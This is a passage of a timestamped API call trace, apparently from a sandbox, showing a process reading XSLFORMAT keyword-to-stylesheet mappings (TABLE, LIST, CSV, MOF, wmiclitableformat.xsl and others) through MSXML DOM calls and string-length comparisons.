[0058.903] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x16b4630, DOMElement=0xcf5d8 | out: DOMElement=0xcf5d8*=0x16b8c58) returned 0x0
[0058.903] IXMLDOMElement:getElementsByTagName (in: This=0x16b8c58, tagName="XSLFORMAT", resultList=0xcf5d4 | out: resultList=0xcf5d4*=0x16b8e80) returned 0x0
[0058.904] IXMLDOMNodeList:get_length (in: This=0x16b8e80, listLength=0xcf5bc | out: listLength=0xcf5bc*=21) returned 0x0
[0058.904] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=0, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.904] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="texttable.xsl") returned 0x0
[0058.904] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.904] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.905] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="TABLE", varVal2=0x0)) returned 0x0
[0058.905] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.905] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.905] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.905] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=1, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.905] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="textvaluelist.xsl") returned 0x0
[0058.905] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.905] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.906] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="VALUE", varVal2=0x0)) returned 0x0
[0058.906] SysStringLen (param_1="VALUE") returned 0x5
[0058.906] SysStringLen (param_1="TABLE") returned 0x5
[0058.906] SysStringLen (param_1="TABLE") returned 0x5
[0058.906] SysStringLen (param_1="VALUE") returned 0x5
[0058.906] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.906] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.906] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.906] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=2, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.906] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="textvaluelist.xsl") returned 0x0
[0058.906] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.906] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.907] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="LIST", varVal2=0x0)) returned 0x0
[0058.907] SysStringLen (param_1="LIST") returned 0x4
[0058.907] SysStringLen (param_1="TABLE") returned 0x5
[0058.907] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.907] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.907] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.907] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=3, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.907] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="rawxml.xsl") returned 0x0
[0058.907] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.907] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.907] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="RAWXML", varVal2=0x0)) returned 0x0
[0058.908] SysStringLen (param_1="RAWXML") returned 0x6
[0058.908] SysStringLen (param_1="TABLE") returned 0x5
[0058.908] SysStringLen (param_1="RAWXML") returned 0x6
[0058.908] SysStringLen (param_1="LIST") returned 0x4
[0058.908] SysStringLen (param_1="LIST") returned 0x4
[0058.908] SysStringLen (param_1="RAWXML") returned 0x6
[0058.908] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.908] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.908] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.908] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=4, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.908] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="htable.xsl") returned 0x0
[0058.908] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.908] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.909] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="HTABLE", varVal2=0x0)) returned 0x0
[0058.909] SysStringLen (param_1="HTABLE") returned 0x6
[0058.909] SysStringLen (param_1="TABLE") returned 0x5
[0058.909] SysStringLen (param_1="HTABLE") returned 0x6
[0058.909] SysStringLen (param_1="LIST") returned 0x4
[0058.909] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.909] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.909] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.909] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=5, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.909] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="hform.xsl") returned 0x0
[0058.909] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.909] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.910] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="HFORM", varVal2=0x0)) returned 0x0
[0058.910] SysStringLen (param_1="HFORM") returned 0x5
[0058.910] SysStringLen (param_1="TABLE") returned 0x5
[0058.910] SysStringLen (param_1="HFORM") returned 0x5
[0058.910] SysStringLen (param_1="LIST") returned 0x4
[0058.910] SysStringLen (param_1="HFORM") returned 0x5
[0058.910] SysStringLen (param_1="HTABLE") returned 0x6
[0058.910] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.910] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.910] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.910] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=6, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.910] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="xml.xsl") returned 0x0
[0058.910] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.910] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.911] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="XML", varVal2=0x0)) returned 0x0
[0058.911] SysStringLen (param_1="XML") returned 0x3
[0058.911] SysStringLen (param_1="TABLE") returned 0x5
[0058.911] SysStringLen (param_1="XML") returned 0x3
[0058.911] SysStringLen (param_1="VALUE") returned 0x5
[0058.911] SysStringLen (param_1="VALUE") returned 0x5
[0058.911] SysStringLen (param_1="XML") returned 0x3
[0058.911] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.911] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.911] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.911] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=7, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.911] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="mof.xsl") returned 0x0
[0058.911] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.912] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.912] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="MOF", varVal2=0x0)) returned 0x0
[0058.912] SysStringLen (param_1="MOF") returned 0x3
[0058.912] SysStringLen (param_1="TABLE") returned 0x5
[0058.912] SysStringLen (param_1="MOF") returned 0x3
[0058.912] SysStringLen (param_1="LIST") returned 0x4
[0058.912] SysStringLen (param_1="MOF") returned 0x3
[0058.912] SysStringLen (param_1="RAWXML") returned 0x6
[0058.912] SysStringLen (param_1="LIST") returned 0x4
[0058.912] SysStringLen (param_1="MOF") returned 0x3
[0058.912] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.912] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.912] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.912] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=8, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.913] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="csv.xsl") returned 0x0
[0058.913] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.913] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.913] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="CSV", varVal2=0x0)) returned 0x0
[0058.913] SysStringLen (param_1="CSV") returned 0x3
[0058.913] SysStringLen (param_1="TABLE") returned 0x5
[0058.913] SysStringLen (param_1="CSV") returned 0x3
[0058.913] SysStringLen (param_1="LIST") returned 0x4
[0058.913] SysStringLen (param_1="CSV") returned 0x3
[0058.913] SysStringLen (param_1="HTABLE") returned 0x6
[0058.913] SysStringLen (param_1="CSV") returned 0x3
[0058.913] SysStringLen (param_1="HFORM") returned 0x5
[0058.913] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.913] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.914] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.914] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=9, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.914] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="texttable.xsl") returned 0x0
[0058.914] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.914] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.914] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0
[0058.914] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.914] SysStringLen (param_1="TABLE") returned 0x5
[0058.914] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.914] SysStringLen (param_1="VALUE") returned 0x5
[0058.914] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.914] SysStringLen (param_1="XML") returned 0x3
[0058.915] SysStringLen (param_1="XML") returned 0x3
[0058.915] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.915] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.915] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.915] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.915] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=10, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.915] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="texttable.xsl") returned 0x0
[0058.916] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.916] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.916] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="texttablewsys", varVal2=0x0)) returned 0x0
[0058.916] SysStringLen (param_1="texttablewsys") returned 0xd
[0058.916] SysStringLen (param_1="TABLE") returned 0x5
[0058.916] SysStringLen (param_1="texttablewsys") returned 0xd
[0058.916] SysStringLen (param_1="XML") returned 0x3
[0058.916] SysStringLen (param_1="texttablewsys") returned 0xd
[0058.916] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.916] SysStringLen (param_1="XML") returned 0x3
[0058.916] SysStringLen (param_1="texttablewsys") returned 0xd
[0058.916] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.916] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.917] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.917] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=11, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.917] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="texttable.xsl") returned 0x0
[0058.917] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.917] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.917] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0
[0058.917] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.917] SysStringLen (param_1="TABLE") returned 0x5
[0058.917] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.917] SysStringLen (param_1="XML") returned 0x3
[0058.917] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.917] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.917] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.917] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.918] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.918] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.918] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.918] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=12, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.918] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="texttable.xsl") returned 0x0
[0058.918] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.918] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.918] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0
[0058.918] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0058.918] SysStringLen (param_1="TABLE") returned 0x5
[0058.918] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0058.918] SysStringLen (param_1="XML") returned 0x3
[0058.918] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0058.918] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.918] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0058.918] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.919] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.919] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0058.919] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.919] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.919] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.919] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=13, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.919] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="texttable.xsl") returned 0x0
[0058.919] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.919] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.919] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0
[0058.919] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.919] SysStringLen (param_1="TABLE") returned 0x5
[0058.920] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.920] SysStringLen (param_1="XML") returned 0x3
[0058.920] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.920] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.920] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.920] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.920] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.920] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.920] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.920] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.920] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.920] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=14, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.920] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="texttable.xsl") returned 0x0
[0058.920] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.920] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.920] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0
[0058.921] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0058.921] SysStringLen (param_1="TABLE") returned 0x5
[0058.921] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0058.921] SysStringLen (param_1="XML") returned 0x3
[0058.921] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0058.921] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.921] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0058.921] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.921] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0058.921] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.921] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.921] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0058.921] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.921] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.921] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.921] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=15, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.921] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="htable.xsl") returned 0x0
[0058.921] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.922] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.922] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0
[0058.922] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0058.922] SysStringLen (param_1="TABLE") returned 0x5
[0058.922] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0058.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.922] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0058.922] SysStringLen (param_1="XML") returned 0x3
[0058.922] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0058.922] SysStringLen (param_1="texttablewsys") returned 0xd
[0058.922] SysStringLen (param_1="XML") returned 0x3
[0058.922] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0058.922] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.922] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.922] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.922] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=16, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.923] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="htable.xsl") returned 0x0
[0058.923] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.923] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.923] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="htable-sortby", varVal2=0x0)) returned 0x0
[0058.923] SysStringLen (param_1="htable-sortby") returned 0xd
[0058.923] SysStringLen (param_1="TABLE") returned 0x5
[0058.923] SysStringLen (param_1="htable-sortby") returned 0xd
[0058.923] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.923] SysStringLen (param_1="htable-sortby") returned 0xd
[0058.923] SysStringLen (param_1="XML") returned 0x3
[0058.923] SysStringLen (param_1="htable-sortby") returned 0xd
[0058.923] SysStringLen (param_1="texttablewsys") returned 0xd
[0058.923] SysStringLen (param_1="htable-sortby") returned 0xd
[0058.923] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0058.923] SysStringLen (param_1="XML") returned 0x3
[0058.923] SysStringLen (param_1="htable-sortby") returned 0xd
[0058.924] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.924] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.924] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.924] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=17, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.924] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="mof.xsl") returned 0x0
[0058.924] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.924] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.924] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0
[0058.924] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0058.924] SysStringLen (param_1="TABLE") returned 0x5
[0058.924] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0058.924] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.924] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0058.924] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.925] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0058.925] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0058.925] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.925] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0058.925] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.925] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.925] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.925] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=18, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.925] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="mof.xsl") returned 0x0
[0058.925] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.925] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.925] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0
[0058.926] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0058.926] SysStringLen (param_1="TABLE") returned 0x5
[0058.926] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0058.926] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.926] SysStringLen (param_1="wmiclimofformat") returned 0xf
